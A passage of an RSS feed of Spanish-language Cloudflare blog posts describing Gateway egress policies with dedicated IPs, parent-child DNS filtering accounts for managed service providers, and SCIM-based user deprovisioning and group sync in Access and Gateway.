    <p>La herramienta de creación de políticas de salida de Gateway proporciona a los administradores más flexibilidad y una mayor especificidad para la salida del tráfico según la identidad del usuario, la postura de dispositivo, la dirección IP de origen/destino y mucho más.</p><p>Un caso de uso común es la salida del tráfico desde geoubicaciones determinadas para proporcionar experiencias geoespecíficas (p. ej., el formato de idioma, las diferencias regionales de la página) para grupos de usuarios seleccionados. Por ejemplo, Cloudflare actualmente está trabajando con el departamento de marketing de un conglomerado de medios de comunicación global. Sus diseñadores y sus expertos web, ubicados en la India, deben verificar el diseño de los anuncios publicitarios y de los sitios web que se utilizan en los distintos países.</p><p>Sin embargo, estos sitios web restringen o cambian el acceso en función de la geolocalización de la dirección IP de origen del usuario. Esto requiere que el equipo utilice un servicio de VPN adicional solo con esta finalidad. Con las políticas de salida, los administradores pueden crear una regla que relacione la dirección IP del dominio o la dirección IP del país de destino con los empleados de marketing y de geolocalización para que la salida del tráfico se realice desde una dirección IP de salida dedicada geolocalizada en el país donde necesitan verificar el dominio. Esto proporciona tranquilidad a su equipo de seguridad, puesto que ya no tienen que mantener otro servicio de VPN solo para marketing, que supone una vulnerabilidad en su protección perimetral, y pueden aplicar todas sus funcionalidades de filtrado a este tráfico.</p><p>Otro caso de uso de ejemplo es añadir a la lista de permitidos el acceso a aplicaciones o servicios que mantiene un tercero. Los administradores de seguridad pueden controlar cómo sus equipos acceden a sus recursos, e incluso aplicar el filtrado a su tráfico, pero no pueden modificar los controles de seguridad que aplican terceros. Por ejemplo, para trabajar con un importante procesador de crédito, utilizaban un servicio de terceros para verificar el nivel de riesgo de las transacciones redireccionadas mediante su red Zero Trust. Este proveedor de terceros requería la adición a la lista de permitidos de sus direcciones IP de origen.</p><p>Para satisfacer este objetivo, este cliente podría simplemente haber utilizado direcciones IP de salida dedicadas y nada más. Sin embargo, esto significaría que todo su tráfico ahora se redireccionaría mediante el centro de datos con direcciones IP de salida dedicadas. Por lo tanto, si un usuario deseara navegar a otro sitio, su experiencia sería mediocre, ya que es posible que su tráfico no siguiera la ruta más eficaz a los sistemas superiores. Ahora, sin embargo, con las políticas de salida el cliente puede aplicar solo esta dirección IP de salida dedicada al tráfico de su proveedor de terceros y dejar la salida del tráfico de todos los otros usuarios mediante las direcciones IP de salida de Gateway por defecto.</p>
    <div>
      <h3>Creación de políticas de salida</h3>
      <a href="#creacion-de-politicas-de-salida">
        
      </a>
    </div>
    <p>Para demostrar la facilidad con la que un administrador puede configurar una política, analicemos el último escenario. Mi organización utiliza un servicio de terceros y, además de un inicio de sesión mediante nombre de usuario y contraseña, para acceder a su dominio requieren que utilicemos un rango de red o de direcciones IP de origen estáticas.</p><p>Para configurar esto, debo ir a Políticas de salida en Gateway en el panel de control de Zero Trust. Una vez allí, puedo hacer clic en "Crear política de salida":</p><p>En el caso de mi organización, la mayoría de mis usuarios que acceden a este servicio de terceros se encuentran en Portugal, por lo que utilizaré mis direcciones IP de salida dedicadas asignadas a Montijo (Portugal). Los usuarios accederán a example.com alojado en 203.0.113.10, por lo que utilizaré el selector de direcciones IP de destino para correlacionar todo el tráfico con este sitio. La configuración de política es la siguiente:</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/yuJg8Ppn8asHZyfbw1L9R/ae805efe79147a7df6b61e04cbf6d0e6/image3-1.png" />
            
            </figure><p>Una vez creada mi política, añadiré una política más como genérica para mi organización para asegurarme de que no utilizan ninguna dirección IP de salida dedicada para destinos que no estén asociados con este servicio de terceros. Esta adición es clave, porque garantiza que mis usuarios obtienen la experiencia de red más eficiente, al mismo tiempo que mantienen su privacidad mediante la salida a través de nuestra agrupación de direcciones IP empresarial compartida. La configuración de política es la siguiente:</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/xfip4X6BAuf5PVeo0wDYE/18556fb7fc1620e4e621aaa9ec13fb6d/image2.png" />
            
            </figure><p>Si echamos un vistazo a la lista de políticas de salida, podemos observar que ambas políticas están activadas. Ahora cuando mis usuarios intentan acceder a example.com utilizarán la dirección IPv4 dedicada primaria o secundaria o el rango de direcciones IPv6 como la dirección IP de salida. Para todo el tráfico restante, se utilizarán las direcciones IP de salida de Cloudflare por defecto.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6pybWxPAfzFcURsoGQ3MC5/9201edcdad977b2698ae8a11e87fadd4/image4.png" />
            
            </figure>
    <div>
      <h3>Pasos siguientes</h3>
      <a href="#pasos-siguientes">
        
      </a>
    </div>
    
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/7nW6c0Qx8QXR4tZT1IMNLH/dfec617aadbd186f79b4f6f5e3445463/image1-3.png" />
            
            </figure><p>Reconocemos que las organizaciones, a medida que se alejan de sus dispositivos locales y redireccionan cada vez más tráfico a través de su conjunto de soluciones de seguridad en la nube, quieren simplicidad y control constantes. Con las políticas de salida de Gateway, ahora los administradores pueden controlar los flujos de tráfico de sus empleados cada vez más distribuidos.</p><p>Si te interesa la creación de políticas en torno a las direcciones IP de salida dedicadas de Cloudflare, puedes añadirlas a un <a href="https://www.cloudflare.com/lp/cio-week-2023-cloudflare-one-contact-us/">plan Enterprise de Cloudflare Zero Trust</a> o ponerte en contacto con tu gestor de cuenta.</p> ]]></content:encoded>
            <category><![CDATA[Cloudflare One]]></category>
            <category><![CDATA[Zero Trust]]></category>
            <category><![CDATA[Cloudflare Gateway]]></category>
            <guid isPermaLink="false">30tNAkm8l8BZhgtLo3fWmK</guid>
            <dc:creator>Ankur Aggarwal</dc:creator>
            <dc:creator>James Chang</dc:creator>
        </item>
        <item>
            <title><![CDATA[Cloudflare Zero Trust para proveedores de servicios administrados]]></title>
            <link>https://blog.cloudflare.com/es-es/gateway-managed-service-provider/</link>
            <pubDate>Fri, 13 Jan 2023 14:00:00 GMT</pubDate>
            <description><![CDATA[ Nuevas funciones de Cloudflare Zero Trust para proveedores de servicios administrados con Gateway DNS ]]></description>
            <content:encoded><![CDATA[ <p>Como parte de la CIO Week, anunciamos una nueva integración entre nuestra solución de filtrado de DNS y nuestra plataforma de inquilinos para socios compatible con los requisitos de políticas padre-hijo para nuestro ecosistema de socios y nuestros clientes directos. Nuestra <a href="https://developers.cloudflare.com/tenant/">plataforma de inquilinos</a>, lanzada en <a href="/announcing-the-new-cloudflare-partner-platform/">2019</a>, ha permitido a los socios de Cloudflare integrar fácilmente las soluciones de Cloudflare en millones de cuentas de clientes. <a href="https://www.cloudflare.com/es-es/products/zero-trust/gateway/">Cloudflare Gateway</a>, presentado en <a href="/protect-your-team-with-cloudflare-gateway/">2020</a>, ha pasado en apenas unos años de proteger redes personales a proteger a empresas de la lista <a href="https://www.cloudflare.com/case-studies/fortune-500-telecommunications-provider/">Fortune 500</a>. Con la integración entre estas dos soluciones, ahora podemos ayudar a los proveedores de servicios administrados (MSP) a respaldar implementaciones multiinquilino de gran tamaño con configuraciones de políticas padre-hijo y anulaciones de políticas a nivel de cuenta que protegen eficazmente a los empleados globales contra las amenazas en línea.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1LupcKjKO1teV5gGz3OTTC/b5aaa97d1513793e8ff2eaef519e8ef7/image4-18.png" />
            
            </figure>
    <div>
      <h2>¿Por qué trabajar con proveedores de servicios administrados?</h2>
      <a href="#por-que-trabajar-con-proveedores-de-servicios-administrados">
        
      </a>
    </div>
    <p>Los proveedores de servicios administrados (MSP) son un componente esencial del kit de herramientas de muchos directores de informática. En la era de la tecnología disruptiva, del trabajo híbrido y de modelos de negocio en evolución, la externalización de las operaciones de TI y de la seguridad puede ser una decisión fundamental que impulse los objetivos estratégicos y garantice el éxito empresarial de organizaciones de cualquier tamaño. Un MSP es una empresa de terceros que administra de forma remota la infraestructura de tecnología de la información (TI) y los sistemas de los usuarios finales de un cliente. Los MSP ofrecen amplios conocimientos técnicos, información sobre amenazas y experiencia permanente en una gran variedad de soluciones de seguridad para la protección contra el ransomware, el malware y otras amenazas en línea. La decisión de asociarse con un MSP puede permitir a los equipos internos centrarse en iniciativas más estratégicas, así como acceder a soluciones de TI y de seguridad de más fácil implementación y con un precio más competitivo. Cloudflare ha estado facilitando a nuestros clientes trabajar con MSP para <a href="https://www.cloudflare.com/learning/insights-roadmap-zerotrust/">implementar y administrar una transformación Zero Trust integral</a>.</p><p>Un criterio decisivo a la hora de seleccionar un MSP adecuado es la capacidad del proveedor de tener en cuenta qué opciones más benefician al socio en materia de tecnología, seguridad y costes. Un MSP debe, siempre que sea posible, aprovechar las soluciones de seguridad innovadoras y de menor coste para generar el mejor valor para tu organización. Puesto que el trabajo híbrido ha ampliado la superficie de ataque, una tecnología obsoleta puede incurrir rápidamente en mayores costes de implementación y mantenimiento en comparación con soluciones más modernas y diseñadas con un objetivo específico. En una área en desarrollo como Zero Trust, un MSP eficaz debería poder proporcionar compatibilidad con proveedores que se puedan implementar a nivel global y administrar a escala, y que apliquen eficazmente una política corporativa global en todas las unidades de negocio. Cloudflare ha trabajado con muchos MSP, algunos de los cuales destacaremos hoy, que implementan y administran políticas de seguridad Zero Trust de forma rentable y a escala.</p><p>Los MSP que destacamos han empezado a implementar el filtrado de DNS de Cloudflare Gateway para complementar su cartera de soluciones como parte de una <a href="https://www.cloudflare.com/es-es/learning/access-management/what-is-access-control/">estrategia de control de acceso</a> Zero Trust. El filtrado de DNS proporciona una rápida rentabilidad a las organizaciones que desean protección contra el ransomware, el malware, el phishing y otras amenazas de Internet. El filtrado de DNS es el proceso de utilizar el <a href="https://www.cloudflare.com/es-es/learning/dns/what-is-dns/">sistema de nombres de dominio</a> para bloquear los sitios web maliciosos y evitar que los usuarios accedan a contenido dañino o inadecuado en Internet. Esto garantiza que los datos de la empresa siguen estando protegidos. También permite que las empresas controlen a qué pueden acceder sus empleados en los dispositivos y las redes administradas por la empresa.</p><p>La organización a menudo consulta al proveedor de servicios sobre cómo establecer las políticas de filtrado. En algunos casos, el MSP o el cliente también debe administrar estas políticas de forma independiente a nivel de unidad de negocio o de cuenta. Esto significa que es muy habitual que sea necesaria una relación padre-hijo para equilibrar la implementación de las reglas a nivel corporativo relativas a la personalización en los dispositivos, las ubicaciones de oficina o las unidades de negocio. Esta estructura es esencial para los MSP que implementan políticas de acceso en millones de dispositivos y cuentas.</p>
    <div>
      <h2>Mejor juntos: Zero Trust ❤️ Plataforma de inquilinos</h2>
      <a href="#mejor-juntos-zero-trust-plataforma-de-inquilinos">
        
      </a>
    </div>
    
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/7g8ziSiEwRjBARMwm1MBd0/b55638156897fa355ccc805035391df4/image2-29.png" />
            
            </figure><p>Para facilitar a los MSP la administración de millones de cuentas con los controles de acceso adecuados y la administración de políticas, hemos integrado Cloudflare Gateway con nuestra plataforma de inquilinos existente con una nueva función que proporciona configuraciones padre-hijo. Esto permite a los MSP socios crear y administrar cuentas, establecer políticas de seguridad corporativa globales y permitir las anulaciones o la administración según corresponda a nivel de equipo o de unidad de negocio individual.</p><p>La plataforma de inquilinos proporciona a los MSP la capacidad de crear millones de cuentas de clientes finales a su discreción para respaldar sus configuraciones y su proceso de incorporación específicos. Esto garantiza también la separación adecuada de la propiedad entre los clientes y permite a los clientes finales acceder directamente al panel de control de Cloudflare, si es necesario.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4xsI2eVC17cv93aRq4zwoO/3f1810292d6182496e7c557b2c56dc51/image1-39.png" />
            
            </figure><p>Cada cuenta creada es un contenedor individual de recursos suscritos (políticas Zero Trust, zonas, workers, etc.) para cada uno de los clientes finales de los MSP. Es posible invitar a los administradores de los clientes a cada cuenta, según sea necesario para la administración de autoservicio, mientras que el MSP mantiene el control de todas las funciones activadas para cada cuenta.</p><p>Ahora que los MSP pueden configurar y administrar las cuentas a escala, analizaremos cómo la integración con Cloudflare Gateway les permite administrar las políticas de filtrado de DNS a escala para estas cuentas.</p>
    <div>
      <h2>Cuentas Zero Trust por niveles</h2>
      <a href="#cuentas-zero-trust-por-niveles">
        
      </a>
    </div>
    <p>Una vez definidas las cuentas individuales para cada cliente final del MSP, este puede administrar toda la implementación o bien proporcionar un portal de autoservicio respaldado por las API de configuración de Cloudflare. Si proporcionas un portal de soporte, significa también que nunca querrás que tus clientes finales bloqueen el acceso a este dominio. Por lo tanto, el MSP puede añadir una política oculta a todas las cuentas de sus clientes finales cuando se incorporen, lo que sería una llamada API puntual. Sin embargo, los problemas surgen cuando necesitan enviar una actualización a dicha política. Esto ahora significa que deben actualizar la política una vez para cada uno de los clientes finales del MSP. Para algunos MSP, esto puede significar más de 1 millón de llamadas API.</p><p>Para ayudar a convertir esto en una única llamada API, hemos introducido el concepto de una cuenta de nivel superior, es decir, una cuenta padre. Esta cuenta padre permite que los MSP establezcan políticas globales que se aplican a todas las consultas DNS antes de las subsiguientes políticas de clientes finales del MSP, es decir, las políticas de cuentas hijo. Esta estructura ayuda a garantizar que los MSP pueden establecer sus propias políticas globales para todas sus cuentas hijo. Al mismo tiempo, cada cuenta hijo puede seguir filtrando sus consultas DNS para cumplir sus necesidades sin afectar a ninguna otra cuenta hijo.</p><p>Esto también abarca más que las políticas por sí solas. Cada cuenta hijo puede crear su propia página de bloqueo personalizada, <a href="/bring-your-certificates-cloudflare-gateway/">cargar sus propios certificados</a> para visualizar estas páginas de bloqueo y configurar sus propios puntos finales DNS (IPv4, IPv6, DoH y DoT) mediante las ubicaciones de Gateway. Además, debido a que estos son exactamente igual que las cuentas de Gateway que no son del MSP, no hay límites inferiores en lo que se refiere a los límites por defecto sobre el número de políticas, ubicaciones o listas por cuenta padre o hijo.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5GTw6mxoNZyAHbq7a5xlT6/dee6e9c8307254ed3de33df9dab562e2/image3-25.png" />
            
            </figure>
    <div>
      <h2>Integraciones de proveedores de servicios administrados</h2>
      <a href="#integraciones-de-proveedores-de-servicios-administrados">
        
      </a>
    </div>
    <p>Para mostrar cómo aplicar esto en la práctica, a continuación presentamos algunos ejemplos reales de cómo los clientes de Cloudflare utilizan esta nueva función de proveedor de servicios administrados para ayudar a proteger sus organizaciones.</p>
    <div>
      <h3>Gobierno federal de los EE. UU.</h3>
      <a href="#gobierno-federal-de-los-ee-uu">
        
      </a>
    </div>
    <p>El gobierno federal de los EE. UU. requiere que muchos de los mismos servicios sean compatibles con un servicio DNS de protección para sus más de 100 agencias civiles. A menudo externalizan muchas de sus operaciones de TI y de seguridad a proveedores de servicios como Accenture Federal Services (AFS).</p><p><a href="/helping-keep-governments-safe-and-secure/">En 2022</a>, la Agencia de Ciberseguridad y Seguridad de las Infraestructuras (CISA) de EE. UU. y el Departamento de Seguridad Nacional (DHS) seleccionaron a Cloudflare y AFS para desarrollar una solución conjunta que ayudara al gobierno federal a protegerse contra los ciberataques. La solución consiste en el solucionador de DNS de protección de Cloudflare, que filtrará las consultas DNS de las oficinas y las ubicaciones del gobierno federal y transmitirá los eventos directamente a la plataforma de Accenture para proporcionar una administración y un almacenamiento de registros unificados.</p><p>Accenture Federal Services proporciona una interfaz central a cada departamento que les permite ajustar sus políticas de filtrado de DNS. Esta interfaz trabaja con la plataforma de inquilinos de Cloudflare y las API de cliente de Gateway para proporcionar una experiencia de cliente eficaz para los empleados del gobierno que administran sus políticas de seguridad utilizando nuestras nuevas configuraciones padre-hijo. CISA, como la cuenta padre, puede establecer sus propias políticas globales. Al mismo tiempo, las agencias, es decir, las cuentas hijo, pueden omitir políticas globales seleccionadas y establecer sus propias páginas de bloqueo por defecto.</p><p>Junto con nuestra estructura padre-hijo, hemos proporcionado algunas mejoras en los ajustes por defecto de la coincidencia y filtrado de de ubicación de DNS. Actualmente, todas las cuentas de Gateway pueden adquirir direcciones IP de solucionador de direcciones IPv4 dedicadas. Estas funcionan muy bien en aquellas situaciones donde un cliente no tiene una dirección IP de origen estática o desea que su propia dirección IPv4 aloje la solución.</p><p>En el caso de CISA, querían no solo una dirección IPv4 dedicada sino también asignar esa misma dirección de la cuenta padre a sus cuentas hijo. Esto les permitiría tener sus propias direcciones IPv4 por defecto para todas las agencias, por lo que la incorporación supone una carga menor. A continuación, también quieren tener la capacidad de cierre en caso de error. Es decir, si una consulta DNS no coincidiera con ninguna ubicación (que debe tener una red/dirección IPv4 de origen configurada) se descartaría. Esto permite a CISA garantizar que solo las redes IPv4 configuradas han tenido acceso a sus servicios de protección. Por último, no teníamos que resolver esto con puntos finales DNS IPv6, DoH y DoT, puesto que estos están personalizados con cada una de las ubicaciones DNS creadas.</p>
    <div>
      <h3>Malwarebytes</h3>
      <a href="#malwarebytes">
        
      </a>
    </div>
    <p><a href="https://www.malwarebytes.com/">Malwarebytes</a>, un líder global en ciberprotección en tiempo real, se integró recientemente con Cloudflare para proporcionar un módulo de filtrado de DNS en su plataforma Nebula. La plataforma Nebula es una solución de operaciones de seguridad alojada en la nube que administra el control de cualquier incidente de malware o ransomware, desde la alerta a su corrección. Este nuevo módulo permite a los clientes de Malwarebytes filtrar según categorías de contenido y añadir reglas de política para grupos de dispositivos. Las necesidades principales eran la capacidad de una integración fácil con su cliente de dispositivo actual y proporcionar administración de cuentas individuales así como margen para la futura ampliación con servicios Zero Trust adicionales como el <a href="https://www.cloudflare.com/es-es/products/zero-trust/browser-isolation/">aislamiento de navegador de Cloudflare</a>.</p><p>Cloudflare ha podido proporcionar una solución integral que se ha integrado fácilmente en la plataforma de Malwarebytes. Esto incluía la utilización de <a href="https://developers.cloudflare.com/cloudflare-one/connections/connect-devices/agentless/dns/dns-over-https/">DNS sobre HTTP (DoH)</a> para segmentar los usuarios en ubicaciones únicas y añadir un <a href="https://developers.cloudflare.com/cloudflare-one/connections/connect-devices/agentless/dns/dns-over-https/#filter-doh-requests-by-user">token único por dispositivo</a> para realizar adecuadamente un seguimiento del ID de dispositivo y aplicar las políticas de DNS correctas. Y, por último, la integración se completó utilizando la <a href="https://developers.cloudflare.com/tenant/">API de inquilinos</a> de Cloudflare, que ha permitido la integración eficaz con su flujo de trabajo y su plataforma actuales. Esta combinación de nuestros servicios Zero Trust y la plataforma de inquilinos ha permitido que Malwarebytes saliera al mercado con rapidez para buscar nuevos segmentos en su negocio.</p><p>"Actualmente, para las organizaciones supone un desafío administrar el acceso a los sitios maliciosos y mantener la seguridad y la productividad de sus usuarios finales. El módulo de filtrado de DNS de Malwarebytes amplía nuestra plataforma de seguridad basada en la nube a la protección web. Tras evaluar otros proveedores Zero Trust, tuvimos claro que Cloudflare podía ofrecer la solución integral que los equipos de seguridad y de TI necesitan, y al mismo tiempo proporciona un rendimiento ultrarrápido. Ahora, los equipos de TI y de seguridad pueden bloquear categorías completas de sitios, beneficiarse de una amplia base de datos de puntuaciones predefinidas de dominios web conocidos y sospechosos, proteger las principales aplicaciones basadas en la web y administrar restricciones de sitios específicos. Esto elimina las complicaciones de la supervisión del acceso a los sitios". - <a href="https://press.malwarebytes.com/2022/06/08/malwarebytes-continues-to-expand-endpoint-protection-platform-with-dns-filtering-module%EF%BF%BC/">Mark Strassman, director de productos, Malwarebytes</a></p>
    <div>
      <h3>Importante ISP global</h3>
      <a href="#importante-isp-global">
        
      </a>
    </div>
    <p>Recientemente hemos estado trabajando con un importante ISP global para admitir el filtrado de DNS que forma parte de una solución de seguridad más amplia ofrecida para familias para más de un millón de cuentas en solo el primer año. El ISP utiliza nuestras API de inquilinos y de Gateway para realizar una integración eficaz con su plataforma actual y su experiencia de usuario con un esfuerzo de ingeniería mínimo. Estamos deseando compartir más detalles sobre esta implementación en los próximos meses.</p>
    <div>
      <h2>¿Y ahora qué?</h2>
      <a href="#y-ahora-que">
        
      </a>
    </div>
    <p>Como destacan las historias anteriores, los MSP desempeñan un papel clave en la protección del heterogéneo ecosistema actual de organizaciones, de cualquier tamaño y nivel de madurez. Empresas de todos los tamaños se encuentran enfrentándose al mismo panorama complejo de amenazas. Afrontan el desafío de mantener una postura de seguridad adecuada y de administrar el riesgo con pocos recursos y herramientas de seguridad limitadas. Los MSP proporcionan los recursos adicionales, la experiencia y las herramientas de seguridad avanzadas que pueden ayudar a reducir el perfil de riesgo de estas empresas. Cloudflare está decidida a facilitar a los MSP la entrega eficaz de soluciones Zero Trust a sus clientes.</p><p>Dada la importancia de los MSP para nuestros clientes y el crecimiento continuado de nuestra red de socios, tenemos previsto lanzar considerables funciones en 2023 y, además, respaldar mejor a nuestros MSP socios. En primer lugar, un elemento clave de nuestro plan de desarrollo es desarrollar un panel de control de administración de inquilinos renovado para una mejor administración de las cuentas y de los usuarios. En segundo lugar, queremos ampliar nuestras configuraciones multiinquilino en todo nuestro conjunto de soluciones Zero Trust para facilitar a los MSP la implementación de soluciones de trabajo híbrido seguras a escala.</p><p>Por último, para ofrecer una mejor compatibilidad con el acceso jerárquico, tenemos previsto ampliar los roles de usuario y el modelo de acceso disponibles actualmente a los MSP socios para permitir que sus equipos respalden y administren más fácilmente sus distintas cuentas. Cloudflare se ha enorgullecido siempre de su facilidad de uso. Nuestro objetivo es lograr que Cloudflare sea la plataforma Zero Trust preferida para los proveedores de servicios y de seguridad a nivel global.</p><p>Durante la CIO week, hemos hablado de cómo nuestros socios están ayudando a modernizar la postura de seguridad de sus clientes para que esté en línea con un entorno que el trabajo híbrido y las infraestructuras de multinube híbrida han transformado. Por último, el poder de Cloudflare Zero Trust se debe a que es una plataforma modular unificada que se beneficia de su combinación de productos, funciones y nuestra red de socios.</p><ul><li><p>Si quieres saber más sobre cómo convertirte en un MSP socio, puedes leer más aquí: <a href="https://www.cloudflare.com/es-es/partners/services/">https://www.cloudflare.com/partners/services</a></p></li><li><p>Si quieres saber más sobre cómo mejorar tu seguridad con el filtrado de DNS y Zero Trust, o quieres empezar hoy mismo, <a href="https://dash.cloudflare.com/sign-up/teams">regístrate aquí</a> para probar tú mismo la plataforma con 50 usuarios gratuitos.</p></li></ul> ]]></content:encoded>
            <category><![CDATA[CIO Week]]></category>
            <category><![CDATA[Cloudflare Gateway]]></category>
            <category><![CDATA[Cloudflare One]]></category>
            <category><![CDATA[Zero Trust]]></category>
            <category><![CDATA[Conectividad cloud]]></category>
            <guid isPermaLink="false">1ZjH3lDdN67ZykIJ2Poclf</guid>
            <dc:creator>Ankur Aggarwal</dc:creator>
            <dc:creator>Dan Hollinger</dc:creator>
            <dc:creator>Teddy Solano</dc:creator>
        </item>
        <item>
            <title><![CDATA[Compatibilidad de Cloudflare Access y Gateway con SCIM]]></title>
            <link>https://blog.cloudflare.com/es-es/access-and-gateway-with-scim/</link>
            <pubDate>Thu, 12 Jan 2023 14:02:00 GMT</pubDate>
            <description><![CDATA[ Cloudflare Access y Gateway ya son compatibles con el protocolo System for Cross-domain Identity Management (SCIM) ]]></description>
            <content:encoded><![CDATA[ <p>Hoy, nos complace anunciar la compatibilidad de Cloudflare Access y Gateway con el protocolo System for Cross-domain Identity Management (SCIM). Antes de adentrarnos en lo que esto significa, demos un paso atrás y repasemos qué son SCIM, Access y Gateway.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4Y4UCjZkqF4azsX8qbM3tY/e879ee99b9444f02f87b1b9ba0af5995/image5-11.png" />
            
            </figure><p><a href="https://www.rfc-editor.org/rfc/rfc7642.txt">SCIM</a> es un protocolo que permite a las organizaciones gestionar las identidades de los usuarios y el acceso a los recursos a través de varios sistemas y dominios. A menudo se utiliza para automatizar el proceso de creación, actualización y eliminación de cuentas y permisos de usuario, y para mantener la sincronización de estas cuentas y permisos en distintos sistemas.</p><p>Por ejemplo, la mayoría de las organizaciones tienen un proveedor de identidad, como Okta o Azure Active Directory, que almacena información sobre sus usuarios, tales como nombres, direcciones y cargos. También es probable que las organizaciones utilicen aplicaciones basadas en la nube para colaboraciones. Para acceder a estas, los usuarios deben crear una cuenta e iniciar sesión con un nombre de usuario y una contraseña. En lugar de crear y gestionar manualmente estas cuentas, la organización puede utilizar SCIM para automatizar el proceso. Tanto el sistema local como la aplicación en la nube están configurados para admitir el protocolo SCIM.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5lfFQAyAoj4oKdZhkqtyct/37735dd182557095960ce8aaaf57b307/Access-SCIM-integration.png" />
            
            </figure><p>Cuando se añade o elimina un nuevo usuario del proveedor de identidad, SCIM crea automáticamente una cuenta para ese usuario en la aplicación basada en la nube, utilizando la información del sistema local. Si se actualiza la información de un usuario en el proveedor de identidad, como un cambio en el puesto de trabajo, el protocolo SCIM actualiza automáticamente la información correspondiente en la aplicación basada en la nube. Si un empleado deja la organización, su cuenta se puede eliminar de ambos sistemas con SCIM.</p><p>El protocolo SCIM ayuda a las organizaciones a gestionar de manera eficaz las identidades y el acceso de los usuarios en varios sistemas, reduciendo la necesidad de intervención manual y garantizando que la información de los usuarios sea precisa y esté actualizada.</p><p>Cloudflare Access proporciona acceso seguro a tus aplicaciones y recursos internos. Se integra con tu proveedor de identidad existente para aplicar una autenticación sólida a los usuarios y garantizar que solo los usuarios autorizados tengan acceso a los recursos de tu organización. Después de que un usuario se autentique correctamente a través del proveedor de identidad, Access inicia una sesión para ese usuario. Cuando expire la sesión, Access redirigirá al usuario de nuevo al proveedor de identidad.</p><p>Del mismo modo, Cloudflare Gateway es una puerta de enlace web segura (SWG) integral que aprovecha las mismas configuraciones del proveedor de identidad que Access para permitir a los administradores crear políticas de inspección HTTP, DNS y red basadas en la identidad. Una vez que un usuario inicia sesión utilizando el cliente WARP a través del proveedor de identidad, su identidad se registra y se evalúa en función de las políticas creadas por el administrador de su organización.</p>
    <div>
      <h3>Desafíos antes de SCIM</h3>
      <a href="#desafios-antes-de-scim">
        
      </a>
    </div>
    <p>Antes de SCIM, si era necesario cancelar el aprovisionamiento de un usuario (p. ej. si causaba baja en la empresa, con motivo de una infracción de seguridad u otros factores), el administrador debía eliminar el acceso del usuario tanto en el proveedor de identidad como en Access. Esto se debía a que la sesión Cloudflare Zero Trust de un usuario permanecía activa hasta que intentaba acceder de nuevo a través del proveedor de identidad. Era una proceso engorroso y propenso a errores, y además daba pie a vulnerabilidades de seguridad si el acceso de un usuario no se eliminaba a tiempo.</p><p>Otro desafío con Cloudflare Access y Gateway era que había que escribir manualmente los grupos de proveedores de identidad. De este modo, si un grupo de proveedores de identidad cambiaba, un administrador tenía que actualizar de forma manual el valor en el panel de control de Cloudflare Zero Trust para reflejar esos cambios. Este proceso era largo y tedioso, y provocaba incoherencias si las actualizaciones no se realizaban con rapidez. Además, requería recursos y conocimientos adicionales para gestionar este proceso con eficacia.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6gPO5LyeJTlK6wBCGaPvKe/51ad34a222b30ddc27ea0511819bbdd6/1_2x.png" />
            
            </figure>
    <div>
      <h3>SCIM para Access y Gateway</h3>
      <a href="#scim-para-access-y-gateway">
        
      </a>
    </div>
    
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/43e51HTYQXmgvlrnMXXECn/1790f7100e8a1f33319c55570ffbd3c5/pasted-image-0.png" />
            
            </figure><p>Ahora, con la integración de SCIM, Access y Gateway puede anular de manera automática el aprovisionamiento a los usuarios cuando se desactiven en un proveedor de identidad y sincronizar los grupos de proveedores de identidad. De esta forma se garantiza que solo los usuarios activos, en el grupo correcto, tengan acceso a los recursos de tu organización, mejorando así la seguridad de tu red.</p><p>La anulación del aprovisionamiento de usuarios mediante el protocolo SCIM escucha cualquier evento de desactivación de usuarios en el proveedor de identidad y, a continuación, revoca todas las sesiones activas de ese usuario. De esta manera se suprime de inmediato su acceso a cualquier aplicación protegida por Access y su sesión a través de WARP para Gateway.</p><p>Además, la integración del protocolo SCIM permite sincronizar la información de los grupos de proveedores de identidad en las políticas de Access y Gateway. Esto significa que todos los grupos de proveedores de identidad estarán disponibles automáticamente en los creadores de políticas de Access y Gateway. También existe la opción de forzar de manera automática a un usuario a volver a autenticarse si cambia su pertenencia a un grupo.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1THRxHewCusYYYlA9ctsDj/3f05354ac1ee932106dd2ca8fe58b9d0/pasted-image-0--1-.png" />
            
            </figure><p>Por ejemplo, si quisieras crear una política de Access que solo se aplicara a los usuarios con correos electrónicos asociados a ejemplo.com y aparte del grupo de usuarios de riesgo, podrías crear una política como la que se muestra a continuación, simplemente seleccionando el grupo de usuarios de riesgo en un desplegable:</p><p>Asimismo, si quisieras crear una política de Gateway para bloquear ejemplo.com y todos sus subdominios para estos mismos usuarios, podrías crear la siguiente política:</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/7d6q2DKIWv6psiD9iES762/dc03b70383e935e0198a9c3d70a2fd1b/pasted-image-0--2-.png" />
            
            </figure>
    <div>
      <h3>¿Y ahora qué?</h3>
      <a href="#y-ahora-que">
        
      </a>
    </div>
    
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/28Kn8u1iqObCiaRzjs52Ii/53a43ddf65f96a894b83bc1e88524b74/pasted-image-0--3-.png" />
            
            </figure><p>En la actualidad, la compatibilidad con SCIM está disponible para Azure Active Directory y Okta para aplicaciones Access autoalojadas. En el futuro, tenemos previsto ampliar la compatibilidad a más proveedores de identidad, así como a Access for SaaS.</p>
    <div>
      <h3>Probar ahora</h3>
      <a href="#probar-ahora">
        
      </a>
    </div>
    <p>SCIM ya está disponible para todos los clientes Zero Trust y se puede utilizar para mejorar las operaciones y la seguridad en general. Prueba <a href="https://one.dash.cloudflare.com/">SCIM para Access y Gateway</a> hoy mismo.</p> ]]></content:encoded>
